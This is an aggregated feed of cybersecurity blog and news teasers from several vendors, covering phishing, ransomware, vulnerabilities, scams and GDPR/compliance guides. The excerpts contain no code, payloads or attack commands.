Bad actors around the globe go phishing in emails twenty-four hours a day, seven days a week. Whether they are “guppies” like your local bakery down the street or big “fish” like Google, no one is immune to their attacks. Google, one of the largest, most well-known – and used – applications, will always be […]

The post Phishing for Google Impersonation Attacks appeared first on GreatHorn.

Read More
GMX.Net Phishing Campaigns: Why They’re Hitting Users’ Inboxes
GMX.Net Phishing Campaigns: Why They’re Hitting Users’ Inboxes

The post GMX.Net Phishing Campaigns: Why They’re Hitting Users’ Inboxes appeared first on GreatHorn.

Read More
Native vs SEG vs ICES: What You Need to Know About Email Security
Native vs SEG vs ICES: What You Need to Know About Email Security

The shift from on-premise email platforms to cloud email platforms has taken shape, with the majority (70%) of organizations. Microsoft 365 and Google Workspace remain the predominant email platforms for organizations. However, a significant change has occurred in the past year. With an estimated 40% of ransomware attacks that start through email, and BEC and […]

The post Native vs SEG vs ICES: What You Need to Know About Email Security appeared first on GreatHorn.

Read More
Blueberry Muffins vs Blonde Chihuahuas: Debunking Artificial Intelligence in Email Security
Blueberry Muffins vs Blonde Chihuahuas: Debunking Artificial Intelligence in Email Security

In cybersecurity, buzzwords come and go, often being replaced with new buzzwords while the market is still attempting to realize the benefits of the former. Today, every technology vendor is talking about Artificial Intelligence (AI). In reality, Machine Learning (the method to one day achieve AI) is still the predominant technical solution deployed within vendor […]

The post Blueberry Muffins vs Blonde Chihuahuas: Debunking Artificial Intelligence in Email Security appeared first on GreatHorn.

Read More
Global Supply Chain: Attackers Targeting Business Deliveries
Global Supply Chain: Attackers Targeting Business Deliveries

Our global supply chain includes all the people, companies and countries that need to work cohesively to manufacture, process and ship goods. Disruptions in the global supply chain are increasingly impacting organizations, with logistical problems crossing most industries.  As a result, the continued strain on the supply chain puts added pressure on businesses as they […]

The post Global Supply Chain: Attackers Targeting Business Deliveries appeared first on GreatHorn.

Read More
Complete Protection Guide for Cybersecurity in Energy and Utilities
Complete Protection Guide for Cybersecurity in Energy and Utilities

In May 2023, hackers struck 22 Danish energy companies simultaneously. The coordinated attack breached Denmark’s critical infrastructure in just days, potentially linked to Russia’s Sandworm group. Attackers exploited firewall vulnerabilities with surgical precision, forcing energy companies to disconnect from the national grid and operate in emergency “island mode.” This attack reveals how cyber threats have […]

The post Complete Protection Guide for Cybersecurity in Energy and Utilities appeared first on Heimdal Security Blog.

Read More
The MSP Who Paid His Client’s Ransom and Tripled His Business
The MSP Who Paid His Client’s Ransom and Tripled His Business

Most MSPs will tell you their worst nightmare is getting a call that a client has been breached. Dan Di Pisa lived that nightmare and then did something extraordinary. He paid his client’s $30,000 ransom demand out of his own pocket. The result? He tripled Fusion Cyber Group’s revenue in two to three years without […]

The post The MSP Who Paid His Client’s Ransom and Tripled His Business appeared first on Heimdal Security Blog.

Read More
Your Protection Guide For Cybersecurity in Manufacturing
Your Protection Guide For Cybersecurity in Manufacturing

Cybersecurity in manufacturing businesses is unique. The sector faces several challenges that other industries don’t have to contend with. And the impacts of any disruption are unusually high.  What is more, manufacturers are increasingly finding themselves in the crosshairs of cybercriminals. In 2024, there was a 71% increase in attacks targeting the sector.  In this […]

The post Your Protection Guide For Cybersecurity in Manufacturing appeared first on Heimdal Security Blog.

Read More
Your Protection Guide for Cybersecurity in Retail and Ecommerce
Your Protection Guide for Cybersecurity in Retail and Ecommerce

It’s surely the biggest fear of any e-commerce site manager. You try logging into your CRM, CMS or inventory management system one morning, only to be greeted by a ransomware note:  “Your system has been locked. Pay into this crypto wallet to release your data”.  Ecommerce and retail businesses face a range of unique threats […]

The post Your Protection Guide for Cybersecurity in Retail and Ecommerce appeared first on Heimdal Security Blog.

Read More
Attack Surface Management Software: Top 10 Vendors
Attack Surface Management Software: Top 10 Vendors

Key Takeaways: What is attack surface management? Why is attack surface management important? What are the best ASM vendors? Over the last few years, attack surface management (ASM) has become an increasingly common category within cybersecurity. The term describes a set of tools that help organizations to identify their IT assets and the vulnerabilities associated […]

The post Attack Surface Management Software: Top 10 Vendors appeared first on Heimdal Security Blog.

Read More
Scattered Spider Breached Allianz Life – How to Prevent This Threat
Scattered Spider Breached Allianz Life – How to Prevent This Threat

Scattered Spider is on the news again – this time they breached Allianz Life. This week’s headlines range from ransomware-ready flaws to physical CCTV vulnerabilities, cloud outages, insurance data breaches, and unfinished patch jobs. Follow cybersecurity advisor Adam Pilton to find out what were the most important threats of the week and how you can […]

The post Scattered Spider Breached Allianz Life – How to Prevent This Threat appeared first on Heimdal Security Blog.

Read More
AI impersonation scams are exploding: Here’s how to spot and stop them
AI impersonation scams are exploding: Here’s how to spot and stop them

The conversational AI market is exploding. Grand View Research suggests it’s set to jump from $11.58 billion in 2024 to $41.39 billion by 2030, a massive 23.7% annual growth rate. While businesses use AI to boost customer service, cybercriminals are jumping in too, launching slick impersonation scams. These scams are spreading fast. A report from […]

The post AI impersonation scams are exploding: Here’s how to spot and stop them appeared first on Heimdal Security Blog.

Read More
Microsoft SharePoint Zero-Day Disrupts Servers Worldwide
Microsoft SharePoint Zero-Day Disrupts Servers Worldwide

Hey, it’s that time of week again. Cybersecurity Advisor Adam Pilton rips through the five biggest cyber headlines shaking up the internet right now. From a critical SharePoint zero-day vulnerability to ransomware policy overhauls he explains what happened and gives you the actionable steps you need to stay safe. SharePoint zero-day (CVE-2025-53770) under active exploitation […]

The post Microsoft SharePoint Zero-Day Disrupts Servers Worldwide appeared first on Heimdal Security Blog.

Read More
Heimdal® Achieves Fifth Consecutive ISAE 3000 SOC 2 Type II Certification
Heimdal® Achieves Fifth Consecutive ISAE 3000 SOC 2 Type II Certification

COPENHAGEN, Denmark, July 23, 2025 – Heimdal is proud to announce that it has once again secured the ISAE 3000 SOC 2 Type II certification, marking the fifth consecutive achievement of this rigorous accreditation. This milestone reflects Heimdal’s long‑standing commitment to data security, operational integrity, and transparency for all customers. Why independent verification matters As […]

The post Heimdal® Achieves Fifth Consecutive ISAE 3000 SOC 2 Type II Certification appeared first on Heimdal Security Blog.

Read More
Inside the Heimdal Labs Deep Dive: A Closer Look at Remote Access Protection
Inside the Heimdal Labs Deep Dive: A Closer Look at Remote Access Protection

Cybercriminals don’t break in, they log in. From exposed RDP ports to compromised VPN credentials and abused remote tools, remote access remains one of the most common and dangerous entry points for threat actors. It’s the silent doorway that, once opened, can lead to full domain compromise, data exfiltration, and devastating ransomware attacks. That’s why […]

The post Inside the Heimdal Labs Deep Dive: A Closer Look at Remote Access Protection appeared first on Heimdal Security Blog.

Read More
123456 Password Leads to McDonald’s Data Breach
123456 Password Leads to McDonald’s Data Breach

Hey there, it’s time for your Weekly Cyber Snapshot with former Cyber Detective Sergeant Adam Pilton. In less than 5 minutes you’ll be up to speed on the five biggest cyber headlines of the week. From a hacked Muppet to ransomware takedowns, leaky AI at the Golden Arches, a betting breach, and SMBs sleepwalking into […]

The post 123456 Password Leads to McDonald’s Data Breach appeared first on Heimdal Security Blog.

Read More
How Smart MSPs Sell with Compliance, Not Just Tools – With Dustin Bolander
How Smart MSPs Sell with Compliance, Not Just Tools – With Dustin Bolander

Today we’re digging into one of the most dreaded but potentially most powerful parts of running an MSP compliance. For many providers, compliance feels like a never-ending checklist, a client headache, or worse, a barrier to growth. But what if you could flip that script? What if regulation became your competitive edge? Our guest today […]

The post How Smart MSPs Sell with Compliance, Not Just Tools – With Dustin Bolander appeared first on Heimdal Security Blog.

Read More
Heimdal Achieves IP Co-Sell Ready and MACC Eligible Status with Microsoft
Heimdal Achieves IP Co-Sell Ready and MACC Eligible Status with Microsoft

Heimdal can now be purchased through Microsoft’s global sales teams and counts toward Azure spending commitments.  This partnership opens new doors for companies looking to strengthen their cybersecurity while making the most of their existing Microsoft investments.  What this means for you  IP Co-Sell Ready status means Microsoft’s sales teams can now sell Heimdal’s solutions […]

The post Heimdal Achieves IP Co-Sell Ready and MACC Eligible Status with Microsoft appeared first on Heimdal Security Blog.

Read More
Cybersecurity in Education – Definition, Threats, Stats and Solutions
Cybersecurity in Education – Definition, Threats, Stats and Solutions

The education sector faces an unprecedented cybersecurity crisis. In just two years, Moody’s has upgraded the risk rating for educational institutions from “moderate” to “high” — a stark warning that schools and universities have become prime targets for cybercriminals. With 217 ransomware attacks hitting educational organizations in the past year alone (a 35% increase), the […]

The post Cybersecurity in Education – Definition, Threats, Stats and Solutions  appeared first on Heimdal Security Blog.

Read More
Ingram Micro Ransomware Attack Shakes IT Supply Chain
Ingram Micro Ransomware Attack Shakes IT Supply Chain

Your weekly dose of the most urgent cyber threats is here. Adam Pilton distilled it all into five critical stories and five things you should actually do about them. Let’s get into it. Ingram Micro Ransomware Attack Disrupts Global IT Supply Chain Ingram Micro, the lifeline distributor for countless MSPs, was slammed by a SafePay […]

The post Ingram Micro Ransomware Attack Shakes IT Supply Chain appeared first on Heimdal Security Blog.

Read More
ISC Stormcast For Friday, August 8th, 2025 https://isc.sans.edu/podcastdetail/9562, (Fri, Aug 8th)
ISC Stormcast For Friday, August 8th, 2025 https://isc.sans.edu/podcastdetail/9562, (Fri, Aug 8th)

No summary available.

Read More
ISC Stormcast For Thursday, August 7th, 2025 https://isc.sans.edu/podcastdetail/9560, (Thu, Aug 7th)
ISC Stormcast For Thursday, August 7th, 2025 https://isc.sans.edu/podcastdetail/9560, (Thu, Aug 7th)

No summary available.

Read More
Mass Internet Scanning from ASN 43350 [Guest Diary], (Thu, Aug 7th)
Mass Internet Scanning from ASN 43350 [Guest Diary], (Thu, Aug 7th)

[This is a Guest Diary by Duncan Woosley, an ISC intern as part of the SANS.edu BACS program]

Read More
Do sextortion scams still work in 2025?, (Wed, Aug 6th)
Do sextortion scams still work in 2025?, (Wed, Aug 6th)

Sextortion e-mails have been with us for quite a while, and these days, most security professionals tend to think of them more in terms of an “e-mail background noise” rather than as if they posed any serious threat. Given that their existence is reasonably well-known even among general public, this viewpoint would seem to be justified… But are sextortion messages really irrelevant as a threat at this point, and can we therefore safely omit this topic during security awareness trainings?

Read More
ISC Stormcast For Wednesday, August 6th, 2025 https://isc.sans.edu/podcastdetail/9558, (Wed, Aug 6th)
ISC Stormcast For Wednesday, August 6th, 2025 https://isc.sans.edu/podcastdetail/9558, (Wed, Aug 6th)

No summary available.

Read More
Stealing Machine Keys for fun and profit (or riding the SharePoint wave), (Tue, Aug 5th)
Stealing Machine Keys for fun and profit (or riding the SharePoint wave), (Tue, Aug 5th)

About 10 days ago exploits for Microsoft SharePoint (CVE-2025-53770, CVE-2025-53771) started being publicly abused – we wrote about that at here and here .

Read More
New Feature: Daily Trends Report, (Mon, Aug 4th)
New Feature: Daily Trends Report, (Mon, Aug 4th)

I implemented a new report today, the "Daily Trends" report. It summarizes noteworthy data received from our honeypot. As with everything, it will improve if you provide feedback :)

Read More
ISC Stormcast For Tuesday, August 5th, 2025 https://isc.sans.edu/podcastdetail/9556, (Tue, Aug 5th)
ISC Stormcast For Tuesday, August 5th, 2025 https://isc.sans.edu/podcastdetail/9556, (Tue, Aug 5th)

No summary available.

Read More
ISC Stormcast For Monday, August 4th, 2025 https://isc.sans.edu/podcastdetail/9554, (Mon, Aug 4th)
ISC Stormcast For Monday, August 4th, 2025 https://isc.sans.edu/podcastdetail/9554, (Mon, Aug 4th)

No summary available.

Read More
Legacy May Kill, (Sun, Aug 3rd)
Legacy May Kill, (Sun, Aug 3rd)

Just saw something that I thought was long gone. The username "pop3user" is showing up in our telnet/ssh logs. I don&#;x26;#;39;t know how long ago it was that I used POP3 to retrieve e-mail from one of my mail servers. IMAP and various webmail systems have long since replaced this classic email protocol. But at least this one attacker is counting on someone still having a "pop3user" configured.

Read More
FBI Report: Attackers Are Sending Physical Packages with Malicious QR Codes
FBI Report: Attackers Are Sending Physical Packages with Malicious QR Codes

The FBI has issued an advisory warning that scammers are distributing QR code phishing (quishing) links via unsolicited packages sent by snail mail.

Recipients may scan the code to find out where the package came from, which will land them on a phishing page.

Read More
Anatomy of a Vishing Scam
Anatomy of a Vishing Scam

I hear about a ton of similar-sounding scam calls, where the scammer is pretending to be from a service you use (or used), offering you a substantial monthly discount (30% or more) if you pay some fee ahead of time.

Read More
Social Engineering Attacks Surged in the First Half of 2025
Social Engineering Attacks Surged in the First Half of 2025

Cybersecurity incidents nearly tripled in the first half of 2025, jumping from 6% in the second half of 2024 to 17% in 2025, according to a new report from LevelBlue.

Read More
Beyond Traditional Defenses: Why French Cyber Resilience Needs to Improve
Beyond Traditional Defenses: Why French Cyber Resilience Needs to Improve

In today's world, cyberattacks are a constant threat. While technical defenses are crucial, people often remain the easiest attack vector for cybercriminals.

Read More
Warning: New Phishing Campaign Targets Instagram Users
Warning: New Phishing Campaign Targets Instagram Users

A phishing campaign is targeting Instagram users with phony notifications about failed login attempts, according to researchers at Malwarebytes.

Read More
ClickFix Social Engineering is Becoming More Popular
ClickFix Social Engineering is Becoming More Popular

ClickFix attacks have been around for decades; only the name is new.

Read More
CyberheistNews Vol 15 #31 [Heads Up] Malicious M365 Connectors Put 300M Accounts at Risk
CyberheistNews Vol 15 #31 [Heads Up] Malicious M365 Connectors Put 300M Accounts at Risk

Read More
How Hackers Exploit Microsoft Teams in Social Engineering Attacks
How Hackers Exploit Microsoft Teams in Social Engineering Attacks

Attackers are using Microsoft Teams calls to trick users into installing the Matanbuchus malware loader, which frequently precedes ransomware deployment, according to researchers at Morphisec.

Read More
If You Think Social Engineering Is Bad, It’s Going To Get Worse
If You Think Social Engineering Is Bad, It’s Going To Get Worse

There is no other way to say it clearer, social engineering is going to be a lot, lot worse soon and far more successful than it is today. And that’s saying a lot. It’s already pretty bad.

Read More
FBI Issues Guidance on Thwarting North Korea’s Fraudulent IT Schemes
FBI Issues Guidance on Thwarting North Korea’s Fraudulent IT Schemes

The FBI has issued an advisory warning that North Korean IT workers continue to seek fraudulent employment at Western companies.

Read More
MY TAKE: The GenAI security crisis few can see — but these startups are mapping the gaps
MY TAKE: The GenAI security crisis few can see — but these startups are mapping the gaps

LAS VEGAS — A decade ago, the rise of public cloud brought with it a familiar pattern: runaway innovation on one side, and on the other, a scramble to retrofit security practices not built for the new terrain.

Related: GenAI (more…)

The post MY TAKE: The GenAI security crisis few can see — but these startups are mapping the gaps first appeared on The Last Watchdog.

Read More
News alert: SpyCloud’s AI-powered platform mimics veteran analysts, speeds threat detection
News alert: SpyCloud’s AI-powered platform mimics veteran analysts, speeds threat detection

Austin, TX, Aug. 6, 2025, CyberNewswire: SpyCloud, the leader in identity threat protection, today announced a significant enhancement to its SaaS Investigations solution: the integration of advanced AI-powered insights that mirror the tradecraft of SpyCloud’s seasoned investigators.

Building on … (more…)

The post News alert: SpyCloud’s AI-powered platform mimics veteran analysts, speeds threat detection first appeared on The Last Watchdog.

Read More
Black Hat Fireside Chat: Inside the ‘Mind of a Hacker’ — A10’s plan for unified threat detection
Black Hat Fireside Chat: Inside the ‘Mind of a Hacker’ — A10’s plan for unified threat detection

In today’s threat landscape, attackers are no longer just exploiting technical flaws — they’re exploiting business logic.

Think gaps in workflows, permissions, and overlooked assumptions in how applications behave. This subtle shift is creating powerful new footholds for cybercriminals and … (more…)

The post Black Hat Fireside Chat: Inside the ‘Mind of a Hacker’ — A10’s plan for unified threat detection first appeared on The Last Watchdog.

Read More
SHARED INTEL Q&A: From alert to fix — Gomboc brings trusted AI to Infrastructure-as-Code
SHARED INTEL Q&A: From alert to fix — Gomboc brings trusted AI to Infrastructure-as-Code

The promise of AI in cybersecurity has been loudly heralded—yet quietly limited.

Related: What is IaC?

Machine learning has proven effective at spotting anomalies and flagging misconfigurations. But resolving those issues remains largely manual, slow, and labor-intensive. A recent Cloud … (more…)

The post SHARED INTEL Q&A: From alert to fix — Gomboc brings trusted AI to Infrastructure-as-Code first appeared on The Last Watchdog.

Read More
News alert: OpenSSL conference to convene experts on cryptograohy, compliance and open-source
News alert: OpenSSL conference to convene experts on cryptograohy, compliance and open-source

Newark, NJ, Aug. 4, 2025, CyberNewswire—Early Bird registration is now available for the inaugural OpenSSL Conference, scheduled for October 7–9, 2025, in Prague. The event will bring together leading voices in cryptography, secure systems, and open-source infrastructure. Early registrants … (more…)

The post News alert: OpenSSL conference to convene experts on cryptograohy, compliance and open-source first appeared on The Last Watchdog.

Read More
STRATEGIC REEL: Proactive by design: Fortinet retools network defense for real-time threats
STRATEGIC REEL: Proactive by design: Fortinet retools network defense for real-time threats

Security teams can no longer afford to wait for alerts — not when cyberattacks unfold in milliseconds.

That’s the core warning from Fortinet’s Derek Manky in a new Last Watchdog Strategic Reel recorded at RSAC 2025. As adversaries adopt AI-driven … (more…)

The post STRATEGIC REEL: Proactive by design: Fortinet retools network defense for real-time threats first appeared on The Last Watchdog.

Read More
News alert: Comp AI lands $2.6M pre-seed to modernize compliance, disrupt SOC 2 market
News alert: Comp AI lands $2.6M pre-seed to modernize compliance, disrupt SOC 2 market

San Francisco, Calif., Aug. 1, 2025, CyberNewswire—Comp AI, an emerging player in the compliance automation space, today announced it has secured $2.6 million in pre-seed funding to accelerate its mission of transforming how companies achieve compliance with critical frameworks … (more…)

The post News alert: Comp AI lands $2.6M pre-seed to modernize compliance, disrupt SOC 2 market first appeared on The Last Watchdog.

Read More
SHARED INTEL Q&A: Inside the access mess no one sees — and the identity risk no one owns
SHARED INTEL Q&A: Inside the access mess no one sees — and the identity risk no one owns

For decades, identity and access management (IAM) and privileged access management (PAM) sat on the sidelines of cybersecurity strategy—viewed more as IT maintenance than frontline defense.

Related: The hidden threat of rogue access

But that’s changing. Fast.

Historically, security investments … (more…)

The post SHARED INTEL Q&A: Inside the access mess no one sees — and the identity risk no one owns first appeared on The Last Watchdog.

Read More
News Alert: SquareX exposes DevTools blind spot allowing widespread browser extension attacks
News Alert: SquareX exposes DevTools blind spot allowing widespread browser extension attacks

Palo Alto, Calif., July 29, 2025, CyberNewswire — Despite the expanding use of browser extensions, the majority of enterprises and individuals still rely on labels such as “Verified” and “Chrome Featured” provided by extension stores as a security indicator.

The … (more…)

The post News Alert: SquareX exposes DevTools blind spot allowing widespread browser extension attacks first appeared on The Last Watchdog.

Read More
MY TAKE: The signal vs. the noise: email messaging in the era of my AI talking to your AI
MY TAKE: The signal vs. the noise: email messaging in the era of my AI talking to your AI

Not long ago, I found myself staring at a reply that could’ve come from a bot.

Related: Microsoft purges ‘knowledge workers’

It was a polite follow-up from a PR rep reiterating a pitch I had already acknowledged — and responded … (more…)

The post MY TAKE: The signal vs. the noise: email messaging in the era of my AI talking to your AI first appeared on The Last Watchdog.

Read More
Adult sites trick users into Liking Facebook posts using a clickjack Trojan
Adult sites trick users into Liking Facebook posts using a clickjack Trojan

We found a host of blogspot pages involved in a malware campaign to promote their own content by using a LikeJack Trojan.

Read More
Facebook users targeted in ‘login’ phish
Facebook users targeted in ‘login’ phish

Scammers are targeting Facebook users in this latest phishing campaign.

Read More
TeaOnHer, the male version of Tea, is leaking personal information on its users too
TeaOnHer, the male version of Tea, is leaking personal information on its users too

TeaOnHer turns out to be at least as leaky as its female counterpart, Tea Dating Advice app.

Read More
How Google, Adidas, and more were breached in a Salesforce scam
How Google, Adidas, and more were breached in a Salesforce scam

Hackers tricked workers over the phone at Google, Adidas, and more to grant access to Salesforce data.

Read More
Meta accessed women’s health data from Flo app without consent, says court
Meta accessed women’s health data from Flo app without consent, says court

A jury has ruled that Meta accessed sensitive information from women's reproductive health tracking app Flo without consent.

Read More
Malwarebytes earns MRG Effitas Android 360° Certificate for mobile threat detection
Malwarebytes earns MRG Effitas Android 360° Certificate for mobile threat detection

Malwarebytes has been awarded the prestigious MRG Effitas Android 360° Certificate, one of the toughest independent tests in mobile security.

Read More
Weight loss scams, or why ‘Jodie Foster’ wants me to lose weight
Weight loss scams, or why ‘Jodie Foster’ wants me to lose weight

Weight loss scams prey on insecurities, and scammers are abusing celebrities and fake news sites to deceive people.

Read More
Perplexity AI ignores no-crawling rules on websites, crawls them anyway
Perplexity AI ignores no-crawling rules on websites, crawls them anyway

Perplexity ignores robots.txt files on websites that say they do not want to be crawled.

Read More
Critical Android vulnerabilities patched—update as soon as you can
Critical Android vulnerabilities patched—update as soon as you can

Google has patched 6 vulnerabilities in Android including two critical ones, one of which can compromise a device without the user needing to do anything.

Read More
Alleged ‘tap-in’ scammer advertised services on social media
Alleged ‘tap-in’ scammer advertised services on social media

A 24-year-old woman who allegedly advertised her services on social media has been arrested for her part in a "tap-in" scam.

Read More
Unexpected snail mail packages are being sent with scammy QR codes, warns FBI
Unexpected snail mail packages are being sent with scammy QR codes, warns FBI

Receiving an unexpected package in the post is not always a pleasant surprise.

Read More
A week in security (July 28 – August 3)
A week in security (July 28 – August 3)

A list of topics we covered in the week of July 28 to August 3 of 2025

Read More
Apple ID scam leads to $27,000 in-person theft of Ohio man
Apple ID scam leads to $27,000 in-person theft of Ohio man

An Ohio man lost $27,000 after an Apple ID scam text hit his phone. The strangest part? It happened at his doorstep.

Read More
OpenAI kills “short-lived experiment” where ChatGPT chats could be found on Google
OpenAI kills “short-lived experiment” where ChatGPT chats could be found on Google

OpenAI removed a short-lived experiment that allowed ChatGPT users to make their conversations discoverable by search engines

Read More
Trump Administration and Big Tech want you to share your health data
Trump Administration and Big Tech want you to share your health data

The Trump Administration is working with 60 companies on a plan to have Americans voluntarily upload their healthcare and medical data.

Read More
Prison visitor details shared with all inmates at correctional facility
Prison visitor details shared with all inmates at correctional facility

A Florida correctional institution leaked the names, email addresses, and telephone numbers of visitors to the facility to every inmate.

Read More
That seemingly innocent text is probably a scam
That seemingly innocent text is probably a scam

Scammers are using texts that appear to have been sent to a wrong number to get targets to engage in a conversation.

Read More
VPN use rises following Online Safety Act’s age verification controls
VPN use rises following Online Safety Act’s age verification controls

VPN use is skyrocketing across the UK as the region's Online Safety Act places age verification controls on adult websites.

Read More
Apple patches multiple vulnerabilities in iOS and iPadOS. Update now!
Apple patches multiple vulnerabilities in iOS and iPadOS. Update now!

Apple has released important security updates for iOS and iPadOS patching 29 vulnerabilities, mostly in WebKit.

Read More
Tea Dating Advice app has users’ private messages disclosed
Tea Dating Advice app has users’ private messages disclosed

After the initial uproar about leaked images, a researcher was able to access Tea Dating app private messages

Read More
A Guide to TOMs (technical and organisational measures) under the GDPR
A Guide to TOMs (technical and organisational measures) under the GDPR

The GDPR (General Data Protection Regulation) references “appropriate technical and organisational measures” nearly 100 times – yet it stops short of providing a precise definition of the term. This article examines what TOMs are, how they align with the GDPR’s overall objectives, what kinds of controls they typically involve, and how to ensure they’re “appropriate”. What are technical and organisational measures? The GDPR requires data controllers and processors to implement security controls to safeguard personal data against unauthorised access, alteration or destruction. These safeguards are known collectively as technical and organisational measures, or TOMs. TOMs are controls that reduce the

The post A Guide to TOMs (technical and organisational measures) under the GDPR appeared first on IT Governance Blog.

Read More
What are the Different Types of Penetration Test?
What are the Different Types of Penetration Test?

And how do you choose the right one for your needs? Penetration testing (also known as ‘pen testing’ or ‘ethical hacking’) offers a vital tool for identifying gaps and opportunities to strengthen your security programme. We asked our head of security testing, James Pickard, to explain the different types of test. In this interview Is your security programme effective? Hi James. What are key challenges when implementing a security programme? Resources and costs are often top of the list. Many organisations have a tight budget for security, and lack in-house specialist skills – which doesn’t combine well with the fact

The post What are the Different Types of Penetration Test? appeared first on IT Governance Blog.

Read More
The Six Data Processing Principles of the UK GDPR Explained
The Six Data Processing Principles of the UK GDPR Explained

Article 5 of the UK GDPR (General Data Protection Regulation) sets out six key data processing principles – sometimes informally referred to as data protection principles. These underpin all personal data processing and serve as a practical framework for ensuring compliance. This blog post outlines each of the six principles, explains how they apply in practice and offers guidance on how to demonstrate compliance. What are the GDPR data processing principles? Lawfulness, fairness and transparency Organisations must process personal data in a way that is: These obligations require you to think about how you collect data, what individuals are told

The post The Six Data Processing Principles of the UK GDPR Explained appeared first on IT Governance Blog.

Read More
The 4 CRISC Domains Explained
The 4 CRISC Domains Explained

The CRISC® (Certified in Risk and Information Systems Control®) certification from ISACA® is a globally recognised credential for IT and business professionals. Launched in 2010, it has become the benchmark for validating expertise in enterprise risk governance and control management. CRISC is aimed at those operating in or aspiring to work in IT risk management roles, such as risk analysts, control professionals, IT managers and compliance officers. It bridges technical knowledge and strategic risk governance capability. Over 30,000 professionals hold CRISC certifications today. What are the 4 CRISC domains? The CRISC exam tests candidates across four domains, structured to reflect

The post The 4 CRISC Domains Explained appeared first on IT Governance Blog.

Read More
What Are ISO 27017 and ISO 27018, and What Are Their Controls?
What Are ISO 27017 and ISO 27018, and What Are Their Controls?

Extending your ISMS to address Cloud security risks ISO 27001 sets out the specification for an ISMS (information security management system). But did you know you can extend your ISO 27001 ISMS to cover specific aspects of Cloud security? Let’s take a closer look at both ISO 27017 and ISO 27018. Note: The current versions of ISO 27017 and ISO 27018, ISO/IEC 27017:2015 and ISO/IEC 27018:2019, are aligned to the previous (2013) edition of ISO 27002. The ISO 27001:2022 standard completely reorganises the control set, adding 11 new controls, including 5.23: Information security for use of Cloud services. No old

The post What Are ISO 27017 and ISO 27018, and What Are Their Controls? appeared first on IT Governance Blog.

Read More
The 9 CISMP Domains Explained
The 9 CISMP Domains Explained

The CISMP (Certificate in Information Security Management Principles) is one of the UK’s most widely recognised entry-level qualifications for information security professionals. Accredited by BCS, The Chartered Institute for IT, it provides a comprehensive foundation in cyber security and information security management. CISMP is designed for individuals working in, or aspiring to work in, security-related roles – particularly those seeking to progress into management or governance positions. It is also suitable for business professionals who need a broader understanding of information security as part of their wider operational responsibilities. It is frequently cited as the first step towards more advanced

The post The 9 CISMP Domains Explained appeared first on IT Governance Blog.

Read More
How One Weak Password Destroyed a 158-Year-Old Company
How One Weak Password Destroyed a 158-Year-Old Company

This evening’s episode of Panorama on BBC One, Fighting Cyber Criminals, examines the 2023 ransomware attack on KNP Logistics, as well as the recent attacks on Marks & Spencer, the Co-op and Harrods. KNP, a Northamptonshire haulage group that included the 158-year-old transport company Knights of Old, lost access to all its data after the Russian Akira group accessed an employee account by exploiting a weak password. Despite reportedly complying with industry standards and holding insurance against cyber attacks, the company couldn’t recover its data and entered administration. The BBC reported at the time that 730 employees would be made

The post How One Weak Password Destroyed a 158-Year-Old Company appeared first on IT Governance Blog.

Read More
Nine Steps to Conducting a GDPR Gap Analysis
Nine Steps to Conducting a GDPR Gap Analysis

A good way to start any compliance project is with a gap analysis to determine both where your current practices fall short of your obligations and where you should focus to bring them up to standard. When it comes to the UK GDPR (General Data Protection Regulation) and DPA (Data Protection Act) 2018, it’s also important to carry out gap analyses on a regular basis to ensure you continue to fulfil your legal obligations, especially when your data processing activities – and the personal data you process – change. Our GDPR Gap Analysis service uses our proprietary GDPR RADAR™ assessment

The post Nine Steps to Conducting a GDPR Gap Analysis appeared first on IT Governance Blog.

Read More
Are You Ready for Cyber Essentials?
Are You Ready for Cyber Essentials?

IASME’s Cyber Essentials Readiness Tool and how it helps you prepare for certification Cyber Essentials is a UK government-backed certification scheme that helps organisations protect themselves from around 80% of common cyber threats. It’s widely recognised as a minimum standard for cyber security assurance and is often required in public-sector procurement contracts. The certification process is managed by IASME (the IASME Consortium), which licenses certification bodies – such as IT Governance Ltd – to carry out Cyber Essentials and Cyber Essentials Plus certifications. What is the Cyber Essentials Readiness Tool? The Cyber Essentials Readiness Tool, developed by IASME on behalf

The post Are You Ready for Cyber Essentials? appeared first on IT Governance Blog.

Read More
How to Write a GDPR Data Retention Policy – with template
How to Write a GDPR Data Retention Policy – with template

Under the GDPR (General Data Protection Regulation), organisations must create a data retention policy to help them manage the way they handle personal information. But how long can you keep personal data for? If you keep sensitive data for too long – even if it’s being held securely and not being misused – you may still be violating the Regulation’s requirements. That might sound strict, but there’s a good reason for it. In this blog, we explain why that’s the case, how data retention policies work and how you can create one in line with the GDPR’s data retention requirements.

The post How to Write a GDPR Data Retention Policy – with template appeared first on IT Governance Blog.

Read More